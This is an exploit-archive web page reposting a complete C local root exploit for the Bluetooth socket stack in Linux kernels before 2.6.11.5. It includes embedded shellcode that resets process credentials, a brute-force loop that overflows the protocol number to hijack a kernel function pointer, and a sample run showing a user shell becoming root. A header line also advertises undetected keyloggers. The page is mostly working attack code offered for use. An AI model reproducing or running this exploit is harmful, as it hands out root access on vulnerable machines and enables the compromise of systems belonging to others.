首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Linux Kernel < 2.6.11.5 BLUETOOTH Stack Local Root Exploit 来源：http://backdoored.net 作者：h4x0r 发布时间：2007-12-19   /* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT * * 19 October 2005 http://backdoored.net Visit us for Undetected keyloggers and packers.Thanx h4x0r bluetooth $ id uid=1000(addicted) gid=100(users) groups=100(users) h4x0r bluetooth $ h4x0r bluetooth $ ./backdoored-bluetooth KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) Checking the Effective user id after overflow : UID = 0 h4x0r bluetooth # id uid=0(root) gid=0(root) groups=100(users) h4x0r bluetooth # h4x0r bluetooth # dmesg PREEMPT SMP Modules linked in: CPU:    0 EIP:    0060:[<c0405ead>]    Not tainted VLI EFLAGS: 00010286   (2.6.9) EIP is at bt_sock_create+0x3d/0x130 eax: ffffffff   ebx: ffebfe34   ecx: 00000000   edx: c051bea0 esi: ffffffa3   edi: ffffff9f   ebp: 00000001   esp: c6729f1c ds: 007b   es: 007b   ss: 0068 Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20) Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34        00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34        c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80 Call Trace: [<c039a3bb>] __sock_create+0xfb/0x2a0 [<c039a58d>] sock_create+0x2d/0x40 [<c039a60b>] sys_socket+0x2b/0x60 [<c039b4e8>] sys_socketcall+0x68/0x260 [<c0117a9c>] finish_task_switch+0x3c/0x90 [<c0117b07>] schedule_tail+0x17/0x50 [<c0115410>] do_page_fault+0x0/0x5e9 [<c01031af>] syscall_call+0x7/0xb Code: 24 0c 89 7c 24 10 83 fb 07 0f 8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00 85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40 */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <sys/types.h> #include <unistd.h> #include <limits.h> #include <signal.h> #include <sys/wait.h> #define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000 #define KERNEL_SPACE_MEMORY_BRUTE_END   0xffffffff #define KERNEL_SPACE_BUFFER 0x100000 char asmcode[] = /*Global shellcode*/ "\xb8\x00\xf0\xff\xff\x31\xc9\x21\xe0\x8b\x10\x89\x8a" "\x80\x01\x00\x00\x31\xc9\x89\x8a\x7c\x01\x00\x00\x8b" "\x00\x31\xc9\x31\xd2\x89\x88\x90\x01\x00\x00\x89\x90" "\x8c\x01\x00\x00\xb8\xff\xff\xff\xff\xc3"; struct net_proto_family { int family; int (*create) (int *sock, int protocol); short authentication; short encryption; short encrypt_net; int   *owner; }; int check_zombie_child(int status,pid_t pid) { waitpid(pid,&status,0); if(WIFEXITED(status))   {   if(WEXITSTATUS(status) != 0xFF)    exit(-1);    }   else if (WIFSIGNALED(status))     {      printf("KERNEL Oops. Exit Code = %d.(%s)\n",WTERMSIG(status),strsignal(WTERMSIG(status)));      return(WTERMSIG(status));     } } int brute_socket_create (int negative_proto_number) { socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */ int i; i = geteuid(); printf("Checking the Effective user id after overflow : UID = %d\n",i); if(i) exit(EXIT_FAILURE); printf("0wnage D0ne bro.\n"); execl("/bin/sh","sh",NULL); exit(EXIT_SUCCESS); } int main(void) { pid_t pid; int counter; int status; int *kernel_return; char kernel_buffer[KERNEL_SPACE_BUFFER]; unsigned int brute_start; unsigned int where_kernel; struct net_proto_family *bluetooth; bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family)); bzero(bluetooth,sizeof(struct net_proto_family)); bluetooth->family = AF_BLUETOOTH; bluetooth->authentication = 0x0;  /* No Authentication */ bluetooth->encryption     = 0x0; /* No Encryption */ bluetooth->encrypt_net    = 0x0;  /* No Encrypt_net */ bluetooth->owner          = 0x0;  /* No fucking owner   */ bluetooth->create         = (int *) asmcode; kernel_return = (int *) kernel_buffer; for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++)    *kernel_return = (int)bluetooth; brute_start =  KERNEL_SPACE_MEMORY_BRUTE_START; printf("Bluetooth stack local root exploit\n"); printf("http://backdoored/net"); while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END ) {    where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ;    where_kernel = -where_kernel;    pid = fork();    if(pid == 0 )    brute_socket_create(where_kernel);    check_zombie_child(status,pid);    brute_start += KERNEL_SPACE_BUFFER;    fflush(stdout); } return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·3proxy 0.5.3g logurl() Remote ·Apple Mac OS X mount_smbfs Sta ·iMesh <= 7.1.0.x (IMWeb.dll 7. ·Shadowed Portal <= 5.7d3 Remot ·jetAudio 7.0.5 COWON Media Cen ·OpenSSL < 0.9.7l / 0.9.8d SSLv ·Rosoft Media Player <= 4.1.7 . ·PHP ZLink 0.3 (go.php) Remote ·SurgeMail v.38k4 webmail Host ·CuteNews <= 1.4.5 Admin Passwo ·MS07-065 Message Queuing Servi ·Jupiter 1.1.5ex Privileges Esc   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved